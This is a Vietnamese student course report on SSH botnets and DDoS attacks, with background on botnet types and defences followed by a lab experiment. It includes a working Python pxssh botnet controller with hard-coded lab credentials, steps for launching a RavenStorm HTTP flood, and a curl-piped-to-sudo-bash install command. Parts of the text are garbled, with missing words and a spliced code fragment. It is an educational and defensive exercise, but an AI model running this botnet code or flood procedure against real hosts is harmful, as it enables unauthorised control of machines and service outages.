1. Trang chủ
  2. » Công Nghệ Thông Tin

Tìm hiểu về ssh botnet

35 16 2

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Nội dung

TÓM TẮT NỘI DUNG ĐỀ TÀI Hiểu về tấn công DDoS , mạng botnet , đặc trưng ,quy trình và giai đoạn tấn công Nghiên cứu khái niệm SSH botnet , cách thức hoạt động và các hình thức tấn công Các phát hiện, ngăn chặn, chiến lược phòng thủ và bảo mật hệ thống để đối phó với tấn công bằng SSH botnet. Thử nghiệm và đánh giá hiệu quả trên môi trường thực tế.

HỌC VIỆN KỸ THUẬT MẬT MÃ KHOA AN TỒN THƠNG TIN BÁO CÁO MƠN HỌC KỸ THUẬT LẬP TRÌNH Đề tài: TÌM HIỂU SSH BOTNET Sinh viên thực hiện: Hà Nội, 3/2023 LỜI NÓI ĐẦU Ngày nay, mạng Internet phát triển mở rộng phạm vi toàn giới Các cổng thơng tin điện tử,dịch vụ mạng,… sống cá nhân, tổ chức Việc công vào hệ thống với nhiều mục đích khác nhau: kinh tế, cá nhân , chí mang màu sắc trị ,… gây tổn thất không nhỏ Cùng với phát triển không ngừng Công nghệ thông tin ,các kỹ thuật công ngày tinh vi, đổi nỗi lo lắng nhà quản trị mạng Một kỹ thuật công sử dụng botnet có SSH botnet - loại botnet phát triển mạnh mẽ gây nguy hiểm cho hệ thống mạng SSH botnet mạng lưới máy tính bị sử dụng để thực công vào hệ thống mạng khác Chúng ta cần nghiên cứu SSH botnet để hiểu rõ cách hoạt động nó, nguy tác hại mà gây cho hệ thống mạng, cách phịng tránh chống lại Nghiên cứu SSH botnet giúp cải thiện việc bảo mật cho hệ thống mạng Đồng thời, cịn giúp cho doanh nghiệp cá nhân cảnh giác cơng mạng mà họ gặp phải, nêu cách phòng tránh chúng Với tất lý trên, chúng em chọn tìm hiểu SSH botnet TĨM TẮT NỘI DUNG ĐỀ TÀI - Hiểu công DDoS , mạng botnet , đặc trưng ,quy trình giai đoạn công - Nghiên cứu khái niệm SSH botnet , cách thức hoạt động hình thức cơng - Các phát hiện, ngăn chặn, chiến lược phịng thủ bảo mật hệ thống để đối phó với công SSH botnet - Thử nghiệm đánh giá hiệu môi trường thực tế LỜI NÓI ĐẦU TÓM TẮT NỘI DUNG ĐỀ TÀI DANH MỤC HÌNH ẢNH Chương 1: Tìm hiểu chung DDoS 1.1 Định nghĩa công DDoS 1.2 Đặc trưng cơng DDoS 1.3 Tìm hiểu mạng botnet 1.3.1 Khái niệm mạng botnet 1.3.2 Quy trình hoạt động mạng botnet 1.4 Các giai đoạn cơng DDoS Chương Tìm hiểu SSH botnet 2.1 Định nghĩa cách hoạt động SSH botnet 2.2 Các loại SSH botnet 2.3 Các hình thức cơng SSH botnet 2.4 Ưu điểm nhược điểm SSH botnet 2.5 Một số loại kỹ thuật phát công SSH botnet 2.6 Các giải pháp ngăn chặn Chương : Thực nghiệm công SSH botnet 3.1 Mơ hình thực nghiệm 3.2 Kịch : Tiến hành kết nối Attacker 3.2.1 Mục tiêu 3.2.2 Thực 3.2.3 Kết 3.2.3 Đánh giá thực nghiệm KẾT LUẬN TÀI LIỆU THAM KHẢO PHỤ LỤC 5 6 8 10 11 11 13 13 14 14 14 29 29 30 31 32 DANH MỤC HÌNH ẢNH Hình 3.1.1: Mơ hình thực nghiệm……………………………………………………… 13 Hình 3.1.2: Địa IP Botmaster……………………………………………………… 13 Hình 3.1.3: Địa IP Attacker………………………………………………………….14 Hình 3.2.1 : Thơng tin user + ip……………………………………………………… 15 Hình 3.2.2 : Qt port mở ip……………………………………… 15 Hình 3.2.3: Mật máy client.……………………………………………………… 18 Hình 3.2.4: Kết nối thành cơng tới Attacker…………………………………………… 20 Hình 3.2.5: Các gói tin kết nối SSH Wireshark chụp lại……………………….20 Hình 3.2.6: Chi tiết gói tin SSH……………………………………………………… 21 Hình 3.2.7: Chi tiết gói tin SSH………………………………………………………….22 Hình 3.2.8: Tạo khóa RSA…………………………………………………………….…23 Hình 3.2.9: Sao chép khóa tới máy Attacker…………………………………………….23 Hình 3.2.10: Website trước bị cơng…………………………………………… 26 Hình 3.2.11 : Cơng cụ khởi chạy………………………………………………… 27 Hình 3.2.12: Cơng cụ Wireshark chụp lại gói tin từ Botmaster tới Attacker…28 Hình 3.2.13 : Cơng cụ Wireshark chụp lại gói tin từ Attacker tới Web Server 28 Hình 3.2.14 : Website bị sập truy cập sau cơng………………… 29 Chương 1: Tìm hiểu chung DDoS 1.1 Định nghĩa công DDoS Tấn công từ chối dịch vụ (Denial of Service Attack) loại công mạng sử dụng để tối đa hóa số lượng yêu cầu gửi đến máy chủ Điều dẫn đến việc hệ thống bị tắc nghẽn bị tận dụng tới mức tối đa khiến cho người dùng hợp pháp truy cập vào tài nguyên dịch vụ máy chủ Mục đích cơng vơ hiệu hóa việc sử dụng dịch vụ Internet mạng kẻ cơng nhắm tới Thơng thường, cơng phát từ xa Tấn công từ chối dịch vụ phân tán (Distributed Denial of Service Attack - DDoS) cải tiến công DoS, hai loại cơng có mục đích làm cạn kiệt tài nguyên mạng bị công khiến hệ thống trì trệ dẫn đến ngừng hoạt động Hacker sử dụng số lượng khổng lồ gói tin từ nhiều máy phân tán (điểm khác DDoS DoS) với địa IP khác để gửi tới máy cần công Một công DDoS thường bao gồm thành phần sau: -Botnet: mạng lưới thiết bị bị kiểm soát từ xa kẻ công -Master: kẻ công điều khiển botnet -Handler: máy chủ sử dụng để điều khiển botnet -Các máy chủ phân tán: máy chủ đóng vai trị làm nhiệm vụ phân tán tác động công -Packet generators: công cụ sử dụng để tạo lượng lớn yêu cầu từ botnet tới mục tiêu -Mục tiêu: trang web, dịch vụ trực tuyến hệ thống mạng bị nhắm vào để gây gián đoạn liệu 1.2 Đặc trưng công DDoS -Sử dụng số lượng hàng trăm hàng ngàn máy tính để cơng hay cịn thường gọi Botnet -Tấn cơng DDoS khó để truy ngược kẻ cơng có nhiều máy tính tham gia, kẻ cơng giả mạo địa IP để lẩn trốn -Phịng chống cơng khó số lượng máy cơng tham gia Cấu hình tường lửa để chặn vài IP với số lượng lớn địa IP độc hại tạo hàng ngàn Zombies gần khơng thể xác định ngăn chặn -Sự ảnh hưởng công DDoS lớn nhiều so với cơng DoS 1.3 Tìm hiểu mạng botnet 1.3.1 Khái niệm mạng botnet Botnet mạng lưới máy tính bị chiếm quyền lây nhiễm phần mềm độc hại, điều khiển nhiều người dùng từ xa để thực hoạt động độc hại công mạng, spam email, phá hoại, trộm thông tin, khai thác tiền điện tử, hình thức cơng khác Các máy tính botnet thường khơng biết chúng bị chiếm quyền nhiễm virus, tất hoạt động chúng điều khiển từ xa hacker Một số botnet lớn bao gồm hàng triệu máy tính tồn giới sử dụng để thực công mạng lớn, gây thiệt hại đáng kể cho tổ chức doanh nghiệp Các bot botnet thường cài đặt máy tính thơng qua email lừa đảo, trang web độc hại lỗ hổng bảo mật hệ thống Khi cài đặt, chúng kết nối với máy chủ điều khiển chờ lệnh để thực hoạt động độc hại 1.3.2 Quy trình hoạt động mạng botnet Đánh vào lỗ hổng an ninh, vá cũ hay server lỗi thời, Bot ẩn máy tính khách hàng – kết nối sẵn với Botmaster, đợi lệnh điều khiển từ Botmaster để tiến hành hoạt động Sau nhận lệnh từ hacker, Bot có hoạt động riêng tùy theo điều khiển từ phía ngồi Nó công theo nhiều cách là: Tạo Spam, công DDoS, chiếm giữ hệ thống, lừa đảo ăn cắp thơng tin Dù cách cơng mục đích cuối điều khiển hoạt động máy tính bị nhiễm, bắt buộc người dùng phải làm theo mệnh lệnh Nếu ta cơng ngược lại Botnet khơng thể đánh sập lại hệ thống máy chủ, mà lại gặp nạn nhân bị nhiễm khác, giống hoạt động lặp lại pear – to – pear Các máy tính bị nhiễm liên kết tạo thành mạng Botnet khó khăn việc tìm mạng điều hành phía sau 1.4 Các giai đoạn công DDoS -Thu thập thông tin: Các tội phạm thu thập thông tin mục tiêu họ, bao gồm địa IP cổng mạng mà họ cơng -Lựa chọn công cụ công: Tội phạm chọn công cụ công phù hợp để công mục tiêu họ Cơng cụ chương trình độc hại phần mềm tạo lưu lượng mạng giả mạo - Phân tán botnet: Tội phạm cố gắng phân tán botnet họ nhiều thiết bị khác Botnet mạng thiết bị kiểm soát từ xa tội phạm, sử dụng để công mục tiêu -Tiến hành công: Tội phạm gửi lượng lớn yêu cầu đến mục tiêu họ, khiến cho hệ thống bị tải phục vụ yêu cầu từ người dùng hợp lệ -Xóa dấu vết: Khi cơng diễn ra, nhà cung cấp dịch vụ mạng (ISP) tổ chức bảo mật phát chặn gói tin cơng phá vỡ botnet Tuy nhiên, tội phạm sử dụng kỹ thuật để tránh phát -Kết thúc công: Cuối cùng, tội phạm ngừng công họ cảm thấy đủ bị ngăn chặn tổ chức bảo mật Chương Tìm hiểu SSH botnet 2.1 Định nghĩa cách hoạt động SSH botnet Định nghĩa: SSH botnet mạng botnet điều khiển từ xa cách sử dụng giao thức SSH (Secure Shell) để công hệ thống bị xâm nhập Các bot mạng sử dụng tài khoản SSH bị đánh cắp để truy cập vào hệ thống mục tiêu thực hoạt động công phát tán mã độc, thực công từ chối dịch vụ, trộm thơng tin, chí kiểm sốt hệ thống từ xa SSH botnet hoạt động theo cách sau: - Tìm kiếm máy chủ SSH: Botnet tìm kiếm máy chủ SSH internet cách sử dụng kỹ thuật quét địa IP tìm kiếm danh sách máy chủ biết -Lây nhiễm: Khi botnet tìm thấy máy chủ SSH, sử dụng lỗ hổng bảo mật kỹ thuật đăng nhập vét cạn mật để lây nhiễm vào máy chủ -Thiết lập kết nối: Sau lây nhiễm thành công, botnet thiết lập kết nối máy chủ để tạo thành mạng lưới điều khiển -Kiểm soát: Sau thiết lập kết nối máy chủ, botnet sử dụng lệnh SSH để kiểm soát máy chủ mạng lưới Các lệnh bao gồm thực công, triển khai chương trình độc hại đánh cắp liệu -Phân tán lây nhiễm: Khi máy chủ kiểm soát botnet, botnet sử dụng máy chủ để tiếp tục tìm kiếm lây nhiễm máy chủ khác -Thu thập liệu: Botnet thu thập thông tin từ máy chủ mục tiêu, bao gồm tài khoản đăng nhập, thông tin hệ thống, tệp tin liệu khác -Chuyển tiếp: Botnet chuyển liệu điều khiển từ máy chủ mục tiêu máy chủ kiểm soát, cho phép kẻ cơng kiểm sốt quản lý botnet từ xa -Tiếp tục hoạt động: Botnet tiếp tục hoạt động bị phát xóa bỏ bị ngừng hoạt động biện pháp phòng ngừa công 2.2 Các loại SSH botnet Dưới số loại SSH botnet phổ biến: -SSH worm botnet: Sử dụng lỗ hổng bảo mật máy chủ SSH để lây nhiễm kiểm soát máy chủ khác -SSH credential stuffing botnet: Sử dụng danh sách tài khoản mật bị đánh cắp từ trang web khác để đăng nhập vào máy chủ SSH -SSH exploit botnet: Sử dụng lỗ hổng bảo mật máy chủ SSH để đưa mã độc vào hệ thống kiểm soát máy chủ -SSH brute-force botnet: Sử dụng từ điển mật để thử đăng nhập vào máy chủ SSH với nhiều cấu hình khác để đánh cắp thông tin đăng nhập -SSH proxy botnet: Sử dụng máy chủ SSH để truy cập vào trang web bị chặn ẩn danh internet -SSH ransomware botnet: Sử dụng máy chủ SSH để triển khai chương trình mã hóa ransomware địi tiền chuộc từ nạn nhân -SSH mining botnet: Sử dụng máy chủ SSH để thực khai thác tiền điện tử (cryptocurrency) cách sử dụng tài nguyên máy chủ 2.3 Các hình thức cơng SSH botnet SSH botnet thực nhiều hình thức cơng khác nhau, số ví dụ: -Brute-force attacks: Đây phương pháp đánh mật phổ biến mà SSH botnet sử dụng để công máy chủ SSH Botnet thử tất khả mật để đăng nhập vào máy chủ SSH, mật đúng, botnet tiếp tục lây nhiễm máy chủ -DDoS attacks: SSH botnet sử dụng để thực công DDoS mục tiêu khác nhau, trang web, máy chủ, ứng dụng, vv Botnet tạo hàng nghìn hàng triệu kết nối từ thiết bị lây nhiễm để gửi lưu lượng truy cập lớn đến mục tiêu, khiến cho mục tiêu truy cập từ người dùng thật -Port scanning: Botnet thực quét cổng để tìm kiếm thiết bị máy chủ có lỗ hổng bảo mật để cơng Sau đó, botnet tìm cách công vào thiết bị để lây nhiễm tạo thành mạng lưới botnet lớn -Data theft: Botnet sử dụng để đánh cắp thơng tin nhạy cảm từ máy chủ lây nhiễm Botnet thu thập thơng tin cá nhân, thơng tin tài khoản, thơng tin thẻ tín dụng thông tin quan trọng khác từ máy chủ try: p.interact() sys.exit(0) except: sys.exit(1) Hình 3.2.4: Kết nối thành cơng tới Attacker Hình 3.2.5: Các gói tin kết nối SSH Wireshark chụp lại 20 Hình 3.2.6: Chi tiết gói tin SSH Phân tích gói tin : thông tin kết nối SSH client server Nó hiển thị thơng số mà client server sử dụng để thiết lập kết nối SSH an tồn Các thơng số bao gồm phiên SSH, thuật tốn mã hóa, thuật tốn key exchange thuật toán khác để bảo vệ kết nối : Sử dụng phương thức trao đổi khóa curve25519-sha256 để trao đổi khóa, với mã hóa Elliptic Curve Diffie-Hellman Key Exchange Reply Sử dụng kiểu khóa host ecdsa-sha2-nistp256 để bảo vệ trình trao đổi khóa Ký chứng thực thơng tin khóa host kiểu ecdsa-sha2-nistp256 21 Hình 3.2.7: Chi tiết gói tin SSH Bước 4: Thiết lập khóa RSA : -’ssh-keygen -t rsa ‘: tạo khóa rsa 22 Hình 3.2.8: Tạo khóa RSA -’ssh-copy-id -i ~/.ssh/id_rsa.pub user@remote_host’ : copy khóa tới Attacker Hình 3.2.9: Sao chép khóa tới máy Attacker Bước : Thêm Attacker vào danh sách botnet, điều khiển tất botnet: 23 import os import optparse from pexpect import pxssh os.system('cls' if os.name == 'nt' else 'clear') print(''' ====================================== SSH BOTNET -2023 ======================================''') class Client: def init (self, host, user, password): self.host = host self.user = user self.password = password self.session = self.connect() def connect(self): try: s = pxssh.pxssh() s.login(self.host, self.user, self.password) return s except Exception as e: print(e) print('\033[91m[-] Error Connecting \033[0m') def send_command(self, cmd): 24 self.session.sendline(cmd) self.session.prompt() return self.session.before def botnet_command(command): for client in Botnet: output = client.send_command(command) print('[*] Output from ' + client.host) print('\033[32m[+] \033[0m' +str(output, encoding='utf-8')+ '\n') def add_client(host, user, password): client = Client(host, user, password) Botnet.append(client) order = input("Command >> ") Botnet = [] #create list add_client('10.4.10.100', 'duong', 'duong') #add_client('host', 'username', 'password') botnet_command(order) Giai đoạn 2: HTTP Flood Attack (DDos ) Máy công gửi lượng lớn yêu cầu HTTP tới máy chủ mục tiêu với tốc độ tần suất cao tốc độ xử lý server Mục tiêu việc làm khiến cho trang web bị chậm trễ ngừng hoạt động khiến cho người dùng khác truy cập vào trang web Ban đầu trang web với địa http://10.4.10.130/dashboard/ hoạt động bình thường 25 Hình 3.2.10: Website trước bị cơng Tiến hành bước sau để công : Bước 1: Kết nối tới Attacker ,sử dụng câu lệnh sau nhập mật để khởi chạy RavenStorm: sudo rst Bước 2: Nhập l7 để lựa chọn module layer Bước 3: Nhập target để chọn tùy chọn target Bước 4: Nhập URL: http://10.4.10.130/dashboard/ Bước 5: Nhập threads để chọn tùy chọn thread Bước 6: Nhập 1000 Bước 7: Nhập run nhấn y để khởi chạy 26 Hình 3.2.11 : Cơng cụ khởi chạy Khi q trình cơng, Wireshark chụp gói tin HTTP request máy công liên tiếp gửi tới máy chủ mục tiêu với tốc độ tần số nhanh Nó khiến cho máy chủ bị tải phục vụ yêu cầu hợp lệ khác 27 Hình 3.2.12: Cơng cụ Wireshark chụp lại gói tin từ Botmaster tới Attacker Hình 3.2.13 : Cơng cụ Wireshark chụp lại gói tin từ Attacker tới Web Server 28 3.2.3 Kết Khi máy công công HTTP Flood vào địa Web Server Website Server bị sập, người dùng truy cập tương tác với website Hình 3.2.14 : Website bị sập khơng thể truy cập sau công 3.2.3 Đánh giá thực nghiệm Sau thực kết nối SSH điều khiển Attacker để thực mục đích lấy liệu, cơng DDoS, SSH botnet khó triển khai máy tính có mật khó, hệ thống bảo mật cao, máy tính có mật yếu,bảo mật thấp SSH botnet dễ để kết nối Do muốn phịng tránh cần phải sử dụng mật khó, nâng cao hệ thống bảo mật Người sử dụng máy tính bị nhiễm SSH botnet khó phát trở thành zombie 29 KẾT LUẬN DDoS loại công từ chối dịch vụ mạng mà kẻ công sử dụng nhiều thiết bị để gửi lưu lượng truy cập đến mục tiêu định, gây hậu làm cho hệ thống mục tiêu tải phục vụ yêu cầu hợp lệ người dùng DDoS gây tổn thất nghiêm trọng cho doanh nghiệp tổ chức, bao gồm liệu, thời gian chết máy chủ, từ ảnh hướng đến mặc uy tín, khả hoạt động tài họ SSH botnet thành phần quan trọng công DDoS Để không trở thành botnet người dùng cần phải sử dụng mật khó , nâng cấp hệ thống bảo mật, sử dụng Firewall, thường xuyên giám sát lưu lượng mạng, các doanh nghiệp, tổ chức cần có chiến lược phịng tránh cụ thể, sử dụng xác thực hai lớp, giới hạn quyền, thường xuyên kiểm tra hệ thống, 30 TÀI LIỆU THAM KHẢO https://killer2499.github.io/portfolio/img/projects/sshbotnet/sshbotnet.html https://www.cybrary.it/blog/0p3n/python-programming-hackers-part-6-creating-ssh-botnet/ https://anninhmang.net/thu-thuat/mot-so-cau-lenh-ssh-kiem-tra-server-khi-bi-tan-cong-ddo s-botnet/ https://github.com/saamnguyen/ https://gist.github.com/Belgium/eba68a10b3de01f01237 31 PHỤ LỤC Hướng dẫn cài đặt mơ hình thực nghiệm 1.1 VMware: phần mềm máy chủ ảo, môi trường ảo có chức hệ thống máy tính ảo với CPU, nhớ, mạng lưu trữ riêng Chúng tạo hệ thống phần cứng vật lý Thực cài đặt VMware theo hướng dẫn video sau: https://youtu.be/mvG5lT3moto 1.2 Xây dựng máy ảo 1.2.1 Xây dựng botmaster: Kali Linux: phân phối hệ điều hành mã nguồn mở Linux, sử dụng nhiều lĩnh vực bảo mật Nó tập hợp nhiều công cụ kiểm tra bảo mật thâm nhập tốt mơi trường hệ điều hành Cấu hình yêu cầu tối thiểu: Dung lượng ổ đĩa: 20GB RAM: 1GB Các bước cài đặt: Bước 1:Truy cập đường dẫn: https://cdimage.kali.org/kali-2022.4/kali-linux-2022.4-vmware-amd64.7z để tiền hành tải Bước 2: Sau tải xong, tiến hành giải file nén vào thư mục Bước 3: Mở phần mềm VMware Sau nhấn vào File, chọn Open…, tìm dẫn đến file vừa giải nén, chọn file có tên kali-linux-2022.4-vmware-amd64.vmx chọn Open Bước 4: Chọn Power on this virtual machine để tiến hành mở máy ảo Bước 5: Khi đến hình đăng nhập, nhập kali ô để tiền hành đăng nhập Bước 6: Mở Terminal nhập lệnh sau để tiến hành cập nhật sudo apt update 32 Hoặc ta làm theo hướng dẫn video : https://youtu.be/FsSqXhebWXI 1.2.2 Xây dựng Attacker : Ubuntu: phân phối hệ điều hành mã nguồn mở Linux, sử dụng nhiều lĩnh vực bảo mật Nó tập hợp nhiều công cụ kiểm tra bảo mật thâm nhập tốt mơi trường hệ điều hành Cấu hình yêu cầu tối thiểu: Dung lượng ổ đĩa: 20GB RAM: 1GB Các bước để cài đặt: Bước 1: Truy cập đường dẫn: https://ubuntu.com/download/desktop để tiền hành tải Bước 2: Vào File chọn New Virtual Machine nhấn tổ hợp phím Ctrl + N để tạo máy ảo VMware Bước 3: Click Next Bước 4: Chọn hệ điều hành cài đặt, tiến hành trỏ đến File ISO Ubuntu Desktop vừa tải máy tính Bước 5: Điền thông tin yêu cầu (Lưu ý: Điền chữ thường ô Username)Bước 6: Chọn thư mục lưu trữ File máy ảo Ubuntu dòng Location Bước 7: Thiết lập CPU cho máy ảo gồm số lõi số nhân Bước 8: Thiết lập chia sẻ RAM Bước 9: Cấu hình mạng máy thật máy ảo (nên chọn NAT) Bước 10: Đặt dung lượng ổ cứng cho máy ảo dựa vào dung lượng trống ổ cứng máy thật Bước 11: Chọn Finish để bắt đầu cài đặt Hoặc ta làm theo hướng dẫn video : https://youtu.be/MDUHaNq1i_A Cài đặt công cụ 2.1 Hướng dẫn cài đặt WebServer thử nghiệm máy chủ XAMPP phần mềm nguồn mở miễn phí dùng để tạo web server máy tính cá 33 nhân (Localhost) Các bước cài đặt: Bước 1: Truy cập đường dẫn chọn phiên phù hợp để tải về: https://www.apachefriends.org/download.html Bước 2: Sau tải xong, mở file lên liên tục nhấn Next cuối nhấn Finish Bước 3: Khởi động file Xampp Control Panel để mở bảng điều khiển Bước 4: Nhập vào Config dịng Apache tiếp tục nhấn dịng có httpd.conf Bước 5: Tìm đến dịng Listen sửa địa IP thành địa IP máy chủ port muốn mở lưu 2.2 Hướng dẫn cài đặt công cụ Raven Storm (DoS Layer 7) Raven Storm công cụ mã nguồn mở sử dụng để thực nghiệm công DoS/DDoS Cách cài đặt: mở Terminal máy công nhập lệnh: curl -s https://raw.githubusercontent.com/Taguar258/Raven-Storm/master/install.sh | sudo bash -s Hướng dẫn sử dụng RavenStorm: https://github.com/Tmpertor/Raven-Storm 34

Ngày đăng: 22/04/2023, 00:02

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w